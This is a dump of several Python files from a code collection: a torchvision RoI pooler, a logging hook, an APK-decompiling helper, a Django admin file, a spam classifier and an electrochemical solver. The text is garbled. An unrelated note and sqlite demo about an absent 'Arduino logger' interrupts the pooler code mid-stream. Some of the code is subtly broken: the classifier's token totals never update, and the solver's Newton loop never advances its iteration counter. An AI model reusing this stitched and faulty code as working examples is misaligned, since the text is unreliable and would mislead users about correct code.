original_input_shape) for feat in features]\n # get the levels in the feature map by leveraging the fact that the network always\n # downsamples by a factor of 2 at each level.\n lvl_min = -torch.log2(torch.tensor(scales[0], dtype=torch.float32)).item()\n lvl_max = -torch.log2(torch.tensor(scales[-1], dtype=torch.float32)).item()\n 
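The Arduino logger above inserts each reading with ? placeholders, which keeps values out of the SQL string itself. A self-contained demo of that pattern against an in-memory database; the table matches the script, while the sample reading is made up:

import sqlite3
from datetime import datetime

db = sqlite3.connect(':memory:')
cur = db.cursor()
cur.execute('CREATE TABLE IF NOT EXISTS temparduino(temp REAL, humid REAL, date TEXT)')

# parameterized insert: sqlite3 binds the tuple, no string formatting needed
cur.execute('INSERT INTO temparduino(temp, humid, date) VALUES (?,?,?)',
            (23.5, 41.2, str(datetime.now())[:16]))
db.commit()
print(cur.execute('SELECT * FROM temparduino').fetchall())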
self.scales = scales\n self.map_levels = LevelMapper(lvl_min, lvl_max)\n\n def forward(self, x, boxes, image_shapes):\n \"\"\"\n Arguments:\n x (OrderedDict[Tensor]): feature maps for each level\n boxes (list[BoxList]): boxes to be used to perform the pooling operation.\n Returns:\n result (Tensor)\n \"\"\"\n x = [v for k, v in x.items() if k in self.featmap_names]\n num_levels = len(x)\n rois = self.convert_to_roi_format(boxes)\n if self.scales is None:\n self.setup_scales(x, image_shapes)\n\n if num_levels == 1:\n return roi_align(\n x[0], rois,\n output_size=self.output_size,\n spatial_scale=self.scales[0],\n sampling_ratio=self.sampling_ratio\n )\n\n levels = self.map_levels(boxes)\n\n num_rois = len(rois)\n num_channels = x[0].shape[1]\n\n dtype, device = x[0].dtype, x[0].device\n result = torch.zeros(\n (num_rois, num_channels,) + self.output_size,\n dtype=dtype,\n device=device,\n )\n\n for level, (per_level_feature, scale) in enumerate(zip(x, self.scales)):\n idx_in_level = torch.nonzero(levels == level).squeeze(1)\n rois_per_level = rois[idx_in_level]\n\n result[idx_in_level] = roi_align(\n per_level_feature, rois_per_level,\n output_size=self.output_size,\n spatial_scale=scale, sampling_ratio=self.sampling_ratio\n )\n\n return result\n","sub_path":"torchvision/ops/poolers.py","file_name":"poolers.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"577303985","text":"from .logger import LoggerHook\n\n\nclass TextLoggerHook(LoggerHook):\n\n def log(self, runner):\n if runner.mode == 'train':\n lr_str = ', '.join(\n ['{:.5f}'.format(lr) for lr in runner.current_lr()])\n log_info = 'Epoch [{}][{}/{}]\\tlr: {}\\t'.format(\n runner.epoch + 1, runner.num_epoch_iters + 1,\n len(runner.data_loader), lr_str)\n else:\n log_info = 'Epoch({}) [{}][{}]\\t'.format(\n runner.mode, runner.epoch, runner.num_epoch_iters + 1)\n log_info += ('Time {avg[batch_time]:.3f} (Data {avg[data_time]:.3f})\\t'\n 'Loss {avg[loss]:.4f}').format(avg=runner.meter.avg)\n if len(runner.outputs['log_vars']) > 1:\n loss_items = []\n for var in runner.outputs['log_vars']:\n if var == 'loss':\n continue\n loss_items.append('{}: {:.4f}'.format(var,\n runner.meter.avg[var]))\n log_info += ' (' + ', '.join(loss_items) + ')'\n runner.logger.info(log_info)\n if self.reset_meter:\n runner.meter.reset()\n","sub_path":"torchpack/runner/hooks/text_logger.py","file_name":"text_logger.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"499549416","text":"#!/usr/bin/env python\n\n## Simple python script to process all APKs in a specified path\n## by converting to .jar and unzipping to named folders\n## 2018 - Kristina Balaam | hello@chmodxx.net\n\nimport os\nimport subprocess\nfrom subprocess import Popen, PIPE\nimport sys\n\n# Find this user's instance of dex2jar.sh\ndef get_dex2jar():\n dex2jar = Popen([\"find\", \"/Users\", \"-name\", \"d2j-dex2jar.sh\", \"-print\", \"-quit\"], stdout=subprocess.PIPE)\n \n # Read from stdout\n return dex2jar.stdout.readline().rstrip()\n\n# Disassemble .dex to .class files zipped in JAR, and unzip to directory\n# with the same name as APKs\n# return path name of these two directories\ndef disassemble_apk(path, apk_path, dex2jar):\n # Disassemble APK with dex2jar and unzip jar file to its\n # own directory\n\n # Call Dex2Jar for the specified APK path in the\n # specified directory\n 
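LevelMapper above implements Eqn.(1) of the FPN paper: k = floor(k0 + log2(sqrt(area) / 224)), clamped to [k_min, k_max]; the pooler then subtracts k_min to index its feature list. A scalar sketch of the same mapping without torch:

import math

def fpn_level(box_area, k_min=2, k_max=5,
              canonical_scale=224, canonical_level=4, eps=1e-6):
    s = math.sqrt(box_area)
    k = math.floor(canonical_level + math.log2(s / canonical_scale + eps))
    return min(max(k, k_min), k_max)

print(fpn_level(224 * 224))  # 4: canonical-size boxes map to the canonical level
print(fpn_level(32 * 32))    # 2: small boxes clamp to the finest level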
subprocess.call([\"sh\", dex2jar, \"-f\", apk_path], cwd=path)\n\n # Determine jar path to eventually unzip it\n jar_path = apk_path.replace(\".apk\", \"-dex2jar.jar\")\n \n # Unzip \n subprocess.call([\"unzip\", \"-o\", \"-q\", jar_path, \"-d\", apk_path.replace(\".apk\", \"-Unzipped\")])\n\n return apk_path.replace(\".apk\", \"-Unzipped\")\n\n# Retrieve absolute paths for all APK files at specified path\ndef retrieve_all_apks(path): \n all_apks = []\n\n # traverse directory structure of the path and store\n # full filenames to list\n for root, dirs, files in os.walk(path):\n for name in files:\n if name.endswith(\".apk\"):\n all_apks.append(os.path.join(root, name))\n \n return all_apks\n\ndef main(path):\n\n # Retrieve dex2jar file and all apks to be disassembled and compared \n dex2jar_path = get_dex2jar()\n all_apks = retrieve_all_apks(path)\n\n # Store unzipped directory paths\n unzipped_paths = []\n\n # Disassemble all apks\n for apk_path in all_apks:\n unzipped_paths.append(disassemble_apk(path, apk_path, dex2jar_path))\n \n return True\n\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1]))\n\n\n","sub_path":"scripts/reverse_apks.py","file_name":"reverse_apks.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"621260777","text":"from django.contrib import admin\nfrom .models import Document, FlatPage, Publication\n\nclass DocumentAdmin(admin.ModelAdmin):\n search_fields = [\n 'user__last_name',\n 'user__first_name',\n 'user__middle_name',\n 'user__user__username',\n 'user__user__email',\n 'name',\n 'series',\n 'number',\n ]\n list_filter = [\n 'type',\n ]\n\n\nadmin.site.register(Document, DocumentAdmin)\nadmin.site.register(FlatPage)\nadmin.site.register(Publication)","sub_path":"eios/core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"277549952","text":"import os\nimport re\nimport math\n\nfile_names = [] # training file names read from the give directory\nham_count = 0 # number of ham email\nspam_count = 0 # number of spam email\n\ntest_file_names = []\n\n\n# all tokens we found in both ham and spam emails. 
its length is NOT the total of (ham_tokens_count + spam_token_count_dict).\nall_tokens = []\nham_tokens_count = 0 # total tokens count in ham\nham_token_count_dict = {} # each token with its count in ham\nham_token_prob_dict = {} # each token with its probability in ham\nspam_tokens_count = 0 # total tokens counnt in spam\nspam_token_count_dict = {} # each token with its count in spam\nspam_token_prob_dict = {} # each token with its probability in spam\n\nham_email_prob = 0\nspam_email_prob = 0\nham_score_dic = {}\nspam_score_dic = {}\nstop_word_list = []\n\ntraining_set_directory = \"simple-train-set-for-develop/\"\ntest_set_directory = \"test/\"\ngenerated_model_file = \"model.txt\"\nstop_words_file = \"stop-words.txt\"\nbaseline_result_file = \"baseline-result.txt\"\nstop_word_model_file = \"stopword-model.txt\" # experiment 2\nstop_word_result_file = \"stopword-result.txt\" # experiment 2\nword_length_model_file = \"wordlength-model.txt\" # experiment 3\nword_length_result_file = \"wordlength-result.txt\" # experiment 3\n\n\nfilter_stop_words = lambda x: x not in stop_word_list\nfilter_word_length = lambda x: len(x) > 2 and len(x) < 9\n\n'''\nRead all file names given the directory name, we need their names to identify whether it is a ham or spam\nHere is where we save all traing files\n'''\n\n\ndef read_file_names_in_directory():\n training_set_directory\n return os.listdir(training_set_directory)\n\n# training with a single file. need to save all info to their persistences\n\n\ndef generate_stop_word_list(file_path):\n global stop_word_list\n f = open(file_path, \"r\", encoding=\"iso8859_2\")\n lines = f.read().splitlines()\n for line in lines:\n stop_word_list.append(line)\n\n\ndef training_with_one_email(file_path, tokens_count, token_count_dict, token_prob_dict):\n global all_tokens\n f = open(training_set_directory + file_path,\n \"r\", encoding=\"iso8859_2\")\n lines = f.read().splitlines()\n for line in lines:\n token_list = re.split(\"[^a-zA-Z]\", line)\n token_list = map(lambda x: x.lower(), token_list)\n token_list = list(filter(filter_stop_words, token_list))\n # token_list = list(filter(filter_word_length, token_list))\n tokens_count = len(token_list) + tokens_count\n for token in token_list:\n # if token.strip():\n # token = str(token).lower()\n # else:\n # continue\n if token in token_count_dict:\n token_count_dict[token] = token_count_dict[token] + 1\n else:\n token_count_dict[token] = 1\n if token not in all_tokens:\n all_tokens.append(token)\n\n# smooth with 0.5 - assume each token will at least show 0.5 time\n\n\ndef calculate_probabilities():\n global ham_token_count_dict, spam_token_count_dict\n vocabulary_len = len(all_tokens)\n for token in all_tokens:\n if token in ham_token_count_dict.keys():\n ham_token_prob_dict[token] = (\n ham_token_count_dict[token] + 0.5) / (ham_tokens_count + 0.5 * vocabulary_len)\n else:\n ham_token_prob_dict[token] = 0.5 / \\\n (ham_tokens_count + 0.5 * vocabulary_len)\n if token in spam_token_count_dict.keys():\n spam_token_prob_dict[token] = (\n spam_token_count_dict[token] + 0.5) / (spam_tokens_count + 0.5 * vocabulary_len)\n else:\n spam_token_prob_dict[token] = 0.5 / \\\n (spam_tokens_count + 0.5 * vocabulary_len)\n\n\ndef generate_model_file(file_name):\n global all_tokens\n f = open(file_name, \"w\")\n line_counter = 1\n for token in sorted(all_tokens):\n if token in ham_token_count_dict:\n token_count_in_ham = str(ham_token_count_dict[token])\n else:\n token_count_in_ham = str(0)\n if token in spam_token_count_dict:\n 
token_count_in_spam = str(spam_token_count_dict[token])\n else:\n token_count_in_spam = str(0)\n toekn_prob_in_ham = str(ham_token_prob_dict[token])\n toekn_prob_in_spam = str(spam_token_prob_dict[token])\n line = str(line_counter) + \" \" + str(token) + \" \" + token_count_in_ham + \" \" + \\\n toekn_prob_in_ham + \" \" + token_count_in_spam + \" \" + toekn_prob_in_spam + \"\\r\"\n f.write(line)\n line_counter = line_counter + 1\n f.close()\n\n\ndef read_files_in_directory(file_path):\n return os.listdir(file_path)\n\n\ndef count_test_category_prob():\n global ham_email_prob\n global spam_email_prob\n test_ham_count = 0\n test_spam_count = 0\n test_file_names = read_files_in_directory(test_set_directory)\n for file in test_file_names:\n if str(file).startswith(\"test-ham\"):\n print(\"Currently testing with file: \" + file)\n test_ham_count = test_ham_count + 1\n else:\n print(\"Currently testing with file: \" + file)\n test_spam_count = test_spam_count + 1\n ham_email_prob = test_ham_count / (test_ham_count + test_spam_count)\n spam_email_prob = test_spam_count / (test_ham_count + test_spam_count)\n\n\ndef calculate_ham_score(file_path):\n global ham_email_prob\n global ham_score_dic\n score = math.log(ham_email_prob, 10)\n f = open(test_set_directory + file_path, \"r\", encoding=\"iso8859_2\")\n lines = f.read().splitlines()\n for line in lines:\n token_list = re.split(\"[^a-zA-Z]\", line)\n token_list = list(filter(filter_stop_words, token_list))\n # token_list = list(filter(filter_word_length, token_list))\n for token in token_list:\n if token.strip():\n token = str(token).lower()\n else:\n continue\n if token in ham_token_prob_dict:\n score = score + math.log10(ham_token_prob_dict[token])\n return score\n\n\ndef calculate_spam_score(file_path):\n global spam_email_prob, spam_score_dic\n score = math.log(spam_email_prob, 10)\n f = open(test_set_directory + file_path, \"r\", encoding=\"iso8859_2\")\n lines = f.read().splitlines()\n for line in lines:\n token_list = re.split(\"[^a-zA-Z]\", line)\n token_list = list(filter(filter_stop_words, token_list))\n # token_list = list(filter(filter_word_length, token_list))\n for token in token_list:\n if token.strip():\n token = str(token).lower()\n else:\n continue\n if token in spam_token_prob_dict:\n score = score + math.log10(spam_token_prob_dict[token])\n return score\n\n\n# script starts from here\ngenerate_stop_word_list(stop_words_file)\nprint(stop_word_list)\n\nfile_names = read_file_names_in_directory()\nfor file in file_names:\n if str(file).startswith(\"train-ham\"):\n print(\"Currently Training with file: \" + file)\n ham_count = ham_count + 1\n training_with_one_email(file, ham_tokens_count,\n ham_token_count_dict, ham_token_prob_dict)\n else:\n print(\"Currently Training with file: \" + file)\n spam_count = spam_count + 1\n training_with_one_email(file, spam_tokens_count,\n spam_token_count_dict, spam_token_prob_dict)\n\n\ncalculate_probabilities()\n\n# generate_model_file(generated_model_file)\ngenerate_model_file(stop_word_model_file)\n# generate_model_file(word_length_model_file)\n\ncount_test_category_prob()\n\n\n\ndef generate_test_file(file_path):\n test_file_names = read_files_in_directory(test_set_directory)\n f = open(file_path, \"w\")\n line_counter = 1\n for file in sorted(test_file_names):\n if str(file).startswith(\"test-ham\"):\n category_name = \"ham\"\n else:\n category_name = \"spam\"\n ham_score = calculate_ham_score(file)\n spam_score = calculate_spam_score(file)\n if ham_score > spam_score:\n category_test = 
\"ham\"\n else:\n category_test = \"spam\"\n if category_name == category_test:\n result = \"right\"\n else:\n result = \"wrong\"\n\n line = str(line_counter) + \" \" + str(file) + \" \" + str(category_name) + \" \" + \\\n str(ham_score) + \" \" + str(spam_score) + \" \" + str(category_test) + \" \" + str(result) + \"\\r\"\n f.write(line)\n line_counter = line_counter + 1\n f.close()\n\n\n#generate_test_file(baseline_result_file)\ngenerate_test_file(stop_word_result_file)\n# generate_test_file(word_length_result_file)\n\nprint(stop_word_list)\n\n\n# test_list_fliter = [\"a\", \"was\", \"sdfsdf\",\"testtest\", \"aren't\", \"onemoregjhgjhgjhgjhghjg\", \"hh\"]\n# test_list_fliter_result = list(filter(filter_stop_words, test_list_fliter))\n# test_list_fliter_result = list(filter(filter_word_length, test_list_fliter))\n# print(test_list_fliter_result)","sub_path":"EmailClassifierTrainingModel.py","file_name":"EmailClassifierTrainingModel.py","file_ext":"py","file_size_in_byte":8982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"551289882","text":"import math\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mtick\nimport os\n\nimport pints\n\nfrom numba import int32, float32, float64# import the types\nfrom numba.experimental import jitclass\n\nspec = [\n ('R', float64),\n ('temp', float64),\n ('F', float64),\n ('s', float64),\n ('GAMMA', float64),\n ('v', float64),\n ('E0', float64),\n ('T0', float64),\n ('I0', float64),\n ('epsilon_start', float64),\n ('epsilon_reverse', float64),\n ('deltaepislon', float64),\n ('mew', float64),\n ('freq', float64),\n ('omega', float64),\n ('epsilon', float64),\n ('epsilon_r', float64),\n ('row', float64),\n ('zeta', float64),\n ('epsilon0_1', float64),\n ('epsilon0_2', float64),\n ('kappa0_1', float64),\n ('kappa0_2', float64),\n ('alpha1', float64),\n ('alpha2', float64),\n ('startT', float64),\n ('revT', float64),\n ('dimlessRevT', float64),\n ('endT', float64),\n ('timeStepSize', float64),\n ('dimlessTimeStepSize', float64),\n ('theta_X', float64[:]),\n ('theta_Z', float64[:]),\n ('dtheta_X_dt', float64[:]),\n ('dtheta_Z_dt', float64[:]),\n ('i', float64[:]),\n ('theta_X_Initial', float64),\n ('theta_Z_Initial', float64),\n ('I_inital', float64),\n ('gamma0', float64),\n ('gamma1', float64),\n ('gamma2', float64),\n ('gamma3', float64),\n ('gamma4', float64),\n ('gamma5', float64),\n ('gamma6', float64),\n ('gamma7', float64)\n]\n\n@jitclass(spec)\nclass newtonRaphsonFT():\n '''\n This is a class to solve the mathematical model outlined in [1] written in base python\n using an implimentation of the Newton-Raphson methond\n\n [1] Adamson, Hope, Martin Robinson, Paul S. Bond, Basem Soboh, Kathryn Gillow, Alexandr N. Simonov, Darrell M. Elton, et al. 2017. \n ‘Analysis of HypD Disulfide Redox Chemistry via Optimization of Fourier Transformed Ac Voltammetric Data’.\n Analytical Chemistry 89 (3): 1565–73. 
https://doi.org/10.1021/acs.analchem.6b03589.\n '''\n\n def __init__(self, timeStepSize: float, inital_current: float = 6.620541e-07, freq: float = 8.95931721948, startPotential: float = -0.15, revPotential: float = -0.75, rateOfPotentialChange: float = -22.35e-3,\n numberOfMeasurements: int= 1000000, deltaepislon: float = 150E-3, uncomp_resis: float = 27.160770551,\n electrode_area: float = 0.03, electode_coverage: float = 6.5e-12):\n\n \n #defining constants\n self.R = 8.314 #J / mol·K the perfect gas constant\n self.temp = 25.0+273.15 # k temperature in kelvin\n self.F = 96485.3329 # A.S.mol−1 Faraday constant\n\n #parameters for non-dimensionalisation\n self.s = electrode_area # E-4 # m^2 geometric area of the electrode\n self.GAMMA = electode_coverage # *1.0e3 #mols per m the surface coverage per unit area of the electrode\n self.v = rateOfPotentialChange #Vs-1 the rate at which the potential is swept over at\n\n # parameters for dimension removal\n self.E0 = (self.R*self.temp)/self.F\n self.T0 = (self.E0/self.v)\n self.I0 = (self.F*self.s*self.GAMMA)/self.T0\n\n # electode potential variables for epsilon\n self.epsilon_start = startPotential/self.E0 \n self.epsilon_reverse = revPotential/self.E0 \n\n self.deltaepislon = deltaepislon/self.E0 # V \n self.mew = 0.0 # phase set by solver\n self.freq = freq #Hz (0.11161564832 seconds per period insure data has even number of periods)\n self.omega = 0.0 # dimensionless omega set by solver 2.0*math.pi*self.freq*self.T0\n self.epsilon = 0.0\n self.epsilon_r = 0.0\n self.row = uncomp_resis*(self.I0/self.E0)# dimensionless uncompensated resistance\n\n\n self.zeta = self.F*self.s*self.GAMMA/(self.T0*self.I0) \n\n # electro-potential of the reaction\n self.epsilon0_1 = 0.0 # set by solver -0.437459534627/self.E0\n self.epsilon0_2 = 0.0 # set by solver -0.46045114238/self.E0\n\n #electron transfer rate constants\n self.kappa0_1 = 0.0 # set by solver kappa0_1 *self.T0\n self.kappa0_2 = 0.0 # set by solver kappa0_2*self.T0\n\n #electron charge transfer coefficients\n self.alpha1 = 0.5\n self.alpha2 = 0.5\n\n\n #time interval\n \n self.startT = 0.0#specify in seconds\n self.revT = abs((revPotential - startPotential)/(rateOfPotentialChange))#specify in seconds\n self.dimlessRevT = self.revT/self.T0#\n self.endT = self.revT*2.0\n self.timeStepSize = timeStepSize # in seconds\n self.dimlessTimeStepSize = timeStepSize/self.T0\n\n self.theta_X = np.zeros(numberOfMeasurements, dtype = np.float64)\n self.theta_Z = np.zeros(numberOfMeasurements, dtype = np.float64)\n self.dtheta_X_dt = np.zeros(numberOfMeasurements, dtype = np.float64)\n self.dtheta_Z_dt = np.zeros(numberOfMeasurements, dtype = np.float64)\n self.i = np.zeros(numberOfMeasurements, dtype = np.float64)\n\n self.theta_X_Initial = 1.0\n self.theta_Z_Initial = 0.0\n self.I_inital = inital_current\n\n\n # capacitance parameters\n self.gamma0 = 0.0\n self.gamma1 = 0.0\n self.gamma2 = 0.0\n self.gamma3 = 0.0\n self.gamma4 = 0.0\n self.gamma5 = 0.0\n self.gamma6 = 0.0\n self.gamma7 = 0.0\n\n\n def find_epsilon(self,time: float, index: int):\n ''' finding epsilon and epsilon_r\n as described in ref [1]\n '''\n if abs(self.T0) == self.T0:\n if time < self.dimlessRevT:\n # epsilon before dc current reversal\n self.epsilon = self.epsilon_start + time + (self.deltaepislon)*math.sin(self.omega*time + self.mew)\n elif time >= self.dimlessRevT:\n # epsilon after dc current reversal\n self.epsilon = self.epsilon_reverse - time + self.dimlessRevT + (self.deltaepislon)*math.sin(self.omega*time + self.mew)\n 
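# The @jitclass decorator used above compiles the whole class with numba, and
# every attribute must be declared in the spec list with an explicit numba
# type. A minimal sketch of that pattern (ToyDecay is illustrative only, not
# part of the solver):
import numpy as np
from numba import float64
from numba.experimental import jitclass

toy_spec = [('rate', float64), ('state', float64[:])]

@jitclass(toy_spec)
class ToyDecay:
    def __init__(self, rate, n):
        self.rate = rate
        self.state = np.ones(n, dtype=np.float64)

    def step(self, dt):
        # explicit Euler update, executed as compiled code
        for k in range(self.state.shape[0]):
            self.state[k] -= self.rate * self.state[k] * dt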
else:\n # taking into account changes is logic if T0 is negative \n if time > self.dimlessRevT:\n # epsilon before dc current reversal\n self.epsilon = self.epsilon_start + time + (self.deltaepislon)*math.sin(self.omega*time + self.mew)\n elif time <= self.dimlessRevT:\n # epsilon after dc current reversal\n self.epsilon = self.epsilon_reverse - time + self.dimlessRevT + (self.deltaepislon)*math.sin(self.omega*time + self.mew)\n\n self.epsilon_r = self.epsilon - self.row*self.i[int(index-1)]\n\n \n def find_dtheta_X_dt(self, index: int):\n '''\n finding dtheta_X/dt as described in ref [1]\n dtheta_X/dt = k10*((1.0 - theta_X - theta_Z)*exp((1.0 - alpha1)*(epsilon_r - epsilon0_1))\n - theta_X*exp(-alpha*(epsilon_r - epsilon0_1)))\n '''\n self.dtheta_X_dt[index] = self.kappa0_1*((1.0 - self.theta_X[index] - self.theta_Z[index])*math.exp((1.0 - self.alpha1)*(self.epsilon_r - self.epsilon0_1))\n - self.theta_X[index]*math.exp(-self.alpha1*(self.epsilon_r - self.epsilon0_1)))\n\n def find_dtheta_Z_dt(self, index: int):\n '''\n finding dtheta_Z/dt as described in ref [1]\n dtheta_Z/dt = k20*((1.0 - theta_X - theta_Z)*exp(alpha2*(epsilon_r - epsilon0_2)\n - theta_Z*exp((1.0 - alpha2)*(epsilon_r - epsilon0_2)))\n '''\n self.dtheta_Z_dt[index] = self.kappa0_2*((1.0 - self.theta_X[index] - self.theta_Z[index])*math.exp(-self.alpha2*(self.epsilon_r - self.epsilon0_2))\n - self.theta_Z[index]*math.exp((1.0 - self.alpha2)*(self.epsilon_r - self.epsilon0_2)))\n\n\n \n def current_function(self, i_n, t, i_n1, index: int):\n ''' \n solving the current function described in ref [1] rearraged to equal zero \n note the backwards euler is used for di/dT\n '''\n\n dtheta_X_dt = self.dtheta_X_dt[index]\n dtheta_Z_dt = self.dtheta_Z_dt[index]\n\n if abs(self.T0) == self.T0:\n if t < self.dimlessRevT:\n # capacitance polynomial before dc current reversal\n gamma0 = self.gamma0\n gamma1 = self.gamma1\n gamma2 = self.gamma2\n gamma3 = self.gamma3\n # epsilon before dc current reversal\n depsilon_rdt = 1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n elif t >= self.dimlessRevT:\n # capacitance polynomial after dc current reversal\n gamma0 = self.gamma4\n gamma1 = self.gamma5\n gamma2 = self.gamma6\n gamma3 = self.gamma7\n # epsilon after dc current reversal\n depsilon_rdt = -1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n else:\n # taking into account changes in logic if T0 is negative \n if t > self.dimlessRevT:\n # capacitance polynomial before dc current reversal\n gamma0 = self.gamma0\n gamma1 = self.gamma1\n gamma2 = self.gamma2\n gamma3 = self.gamma3\n # epsilon before dc current reversal\n depsilon_rdt = 1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n elif t <= self.dimlessRevT:\n # capacitance polynomial after dc current reversal\n gamma0 = self.gamma4\n gamma1 = self.gamma5\n gamma2 = self.gamma6\n gamma3 = self.gamma7\n # epsilon after dc current reversal\n depsilon_rdt = -1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n \n return(-i_n1 + (gamma0 + gamma1*self.epsilon_r + gamma2*math.pow(self.epsilon_r, 2.0 ) + gamma3*math.pow(self.epsilon_r, 3.0 ))*depsilon_rdt \n + self.zeta*(dtheta_X_dt - dtheta_Z_dt))\n\n \n def deriv_current_function(self,i_n, t, i_n1):\n ''' solving the differential WRT i current function 
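# current_function() above is the residual F(i_{n+1}) = 0 of a backward-Euler
# step, and newton_raphson() further below drives it to zero with the update
# x <- x - F(x)/F'(x). The bare pattern on a toy ODE di/dt = -2*i, assuming a
# fixed step dt (nothing here is taken from the solver itself):
def residual(i_next, i_prev, dt):
    # backward Euler: (i_next - i_prev)/dt + 2*i_next = 0
    return (i_next - i_prev) / dt + 2.0 * i_next

def d_residual_di(dt):
    return 1.0 / dt + 2.0

def implicit_step(i_prev, dt, tol=1e-5, max_iter=100):
    x = i_prev  # the previous value is the natural initial guess
    for _ in range(max_iter):
        h = residual(x, i_prev, dt) / d_residual_di(dt)
        x -= h
        if abs(h) < tol:
            break
    return x

print(implicit_step(1.0, 0.01))  # ~0.9804, one implicit step of the decay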
described in ref [1] rearraged to equal zero \n note the backwards euler is used for di/dT\n '''\n \n if abs(self.T0) == self.T0:\n if t < self.dimlessRevT:\n # capacitance polynomial before dc current reversal\n gamma0 = self.gamma0\n gamma1 = self.gamma1\n gamma2 = self.gamma2\n gamma3 = self.gamma3\n # epsilon before dc current reversal\n depsilon_rdt = 1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n elif t >= self.dimlessRevT:\n # capacitance polynomial after dc current reversal\n gamma0 = self.gamma4\n gamma1 = self.gamma5\n gamma2 = self.gamma6\n gamma3 = self.gamma7\n # epsilon after dc current reversal\n depsilon_rdt = -1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n else:\n # taking into account changes in logic if T0 is negative \n if t > self.dimlessRevT:\n # capacitance polynomial before dc current reversal\n gamma0 = self.gamma0\n gamma1 = self.gamma1\n gamma2 = self.gamma2\n gamma3 = self.gamma3\n # epsilon before dc current reversal\n depsilon_rdt = 1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n elif t <= self.dimlessRevT:\n # capacitance polynomial after dc current reversal\n gamma0 = self.gamma4\n gamma1 = self.gamma5\n gamma2 = self.gamma6\n gamma3 = self.gamma7\n # epsilon after dc current reversal\n depsilon_rdt = -1.0 + self.omega*(self.deltaepislon)*math.cos(self.omega*t + self.mew) -(self.row*(i_n1 - i_n ))/self.dimlessTimeStepSize\n \n d2epsilon_rdidt = -self.row/self.dimlessTimeStepSize\n\n return(-1.0 + (-gamma1*self.row - 2.0*gamma2*self.row*(self.epsilon - self.row*i_n1) - 3.0*gamma3*self.row*math.pow((self.epsilon - self.row*i_n1),2.0))*depsilon_rdt \n + (gamma0 + gamma1*self.epsilon_r + gamma2*math.pow(self.epsilon_r, 2.0 ) + gamma3*math.pow(self.epsilon_r, 3.0 ))*d2epsilon_rdidt)\n\n \n def newton_raphson(self, time, index: int):\n '''implementation of the newton-raphson method to solve for the current i at the next time step\n '''\n\n x0 = self.i[int(index-1)]\n x1 = self.i[int(index-1)]\n\n if time == 0.0 or time == -0.0:\n print('inital didT: ', self.deriv_current_function(x0, time, x1))\n\n h = self.current_function(x0, time, x1, index)/self.deriv_current_function(x0, time, x1)\n\n iterations = 0\n max_iterations = 100\n while abs(h) >= 0.00001 and iterations <= max_iterations:\n\n h = self.current_function(x0, time, x1, index)/self.deriv_current_function(x0, time, x1)\n\n # x(i+1) = x(i) - f(x) / f'(x) \n\n x1 = x1 - h\n\n self.i[index] = x1\n\n \n def backwards_euler(self, index: int):\n '''\n applies the backwards euler method to theta_X and theta_Z\n as f(i(n),theta(n+1),time(n+1))\n i(n) is used to simplify the equation (rather than i(n+1))\n However, I believe this introduces error and is responsbile for the differences\n seen between this method and the pints implementation it is compared to.\n It helps explain why it scales with increasing row (uncompensated compensated)\n as the error will be greatest on the calculation of i(n+1) later\n '''\n A = math.exp((1.0 - self.alpha1)*(self.epsilon_r - self.epsilon0_1))\n B = math.exp(-self.alpha1*(self.epsilon_r - self.epsilon0_1))\n C = math.exp(-self.alpha2*(self.epsilon_r - self.epsilon0_2))\n D = math.exp((1.0 - self.alpha2)*(self.epsilon_r - self.epsilon0_2))\n\n left = np.array([[1.0/self.dimlessTimeStepSize + self.kappa0_1*A + self.kappa0_1*B, self.kappa0_1*A],\n 
[self.kappa0_2*C, 1.0/self.dimlessTimeStepSize + self.kappa0_2*C + self.kappa0_2*D]])\n\n right = np.array([[self.kappa0_1*A + self.theta_X[int(index-1)]/self.dimlessTimeStepSize],\n [self.kappa0_2*C + self.theta_Z[int(index-1)]/self.dimlessTimeStepSize]])\n\n solution = np.linalg.solve(left,right)\n\n self.theta_X[index] = solution[0,0]\n self.theta_Z[index] = solution[1,0]\n\n\n def set_faradaic_parameters(self, parameters):\n\n # electro-potential of the reaction\n self.kappa0_1 = parameters[0]\n self.kappa0_2 = parameters[1]\n self.epsilon0_1 = parameters[2]\n self.epsilon0_2 = parameters[3]\n self.mew = parameters[4]\n self.zeta = parameters[5]\n\n def set_capacitance_params(self, cap_params = None):\n '''\n takes a list of capasiance parameters and sets these for the model\n :param: cap_params = [gamma0, gamma1, gamma2, gamma3, omega]\n defaults to[0.0001411712994, 0.0195931114228, 0.000639515427465, 6.94671729801e-06, 2.0*math.pi*self.freq*self.T0]\n '''\n # if cap_params == None:\n # cap_params = self.suggested_capacitance_params()\n\n non_dimensiosation_constant = self.E0*self.s/(self.T0*self.I0)\n self.gamma0 = (cap_params[0]*non_dimensiosation_constant)\n self.gamma1 = (cap_params[1]*self.E0)*non_dimensiosation_constant\n self.gamma2 = (cap_params[2]*math.pow(self.E0,2.0))*non_dimensiosation_constant\n self.gamma3 = (cap_params[3]*math.pow(self.E0,3.0))*non_dimensiosation_constant\n 